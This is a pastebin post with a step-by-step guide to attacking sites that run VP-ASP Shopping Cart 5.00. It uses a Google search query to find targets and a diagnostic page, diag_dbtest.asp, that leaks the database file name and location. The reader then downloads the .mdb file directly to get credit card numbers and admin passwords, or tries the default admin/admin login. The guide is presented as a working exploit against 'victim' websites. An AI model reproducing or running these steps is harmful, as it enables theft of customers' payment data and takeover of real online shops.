Part of Slepp's ProjectsPastebinTURLImagebinFilebin
Feedback -- English French German Japanese
Create Upload Newest Tools Donate

Advertising

無題
2006年 10月 12日 木曜日 05:52:26 MDT 

  1. Go to google.com
  2.  and type.
  3.  intitle: VP-ASP Shopping Cart 5.00
  4.  You will find many websites with VP-ASP 5.00 cart software installed
  5.  Now let's go to the exploit..
  6.  the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
  7.  The exploit is : diag_dbtest.asp
  8.  so do this>
  9.  ****://***.victim.com/shop/diag_dbtest.asp
  10.  A page will appear contain those:
  11.  xDatabase
  12.  shopping140
  13.  xDblocation
  14.  resx
  15.  xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypex
  16.  xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber.:. EXAMPLE .:.
  17.  the most important thing here is xDatabase
  18.  xDatabase: shopping140
  19.  ok now the URL will be like this:
  20.  ****://***.victim.com/shop/shopping140.mdb
  21.  continue 04/02/2005 22:53
  22.  if you didn't download the Database..
  23.  Try this while there is dblocation.
  24.  xDblocation
  25.  resx
  26.  the url will be:
  27.  ****://***.victim.com/shop/resx/shopping140.mdb
  28.  If u see the error message you have to try this :
  29.  ****://***.victim.com/shop/shopping500.mdb
  30.  download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at
  31.  download.com Or use MS Office Access.
  32.  inside you should be able to find credit card information.
  33.  and you should even be able to find the admin username and password for the website.
  34.  the admin login page is usually located here
  35.  ****://***.victim.com/shop/shopadmin.asp
  36.  if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb
  37.  file at all then try to find the admin login page and enter the default passwords which are
  38.  Username: admin
  39.  password: admin

advertising

ポストを更新

このポストは更新できる、または、新しいポストを作成

You may also comment on this post.

ペーストの更新
ポストの詳細 (随意)

注目: ペーストのコンテントだけで必要ですが、以下の情報は便利かも知れません。

名前/タイトルを保存する?

(スペースで切る, 随意)



Please note that information posted here will not expire by default. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.

comments powered by Disqus
worth-right worth-right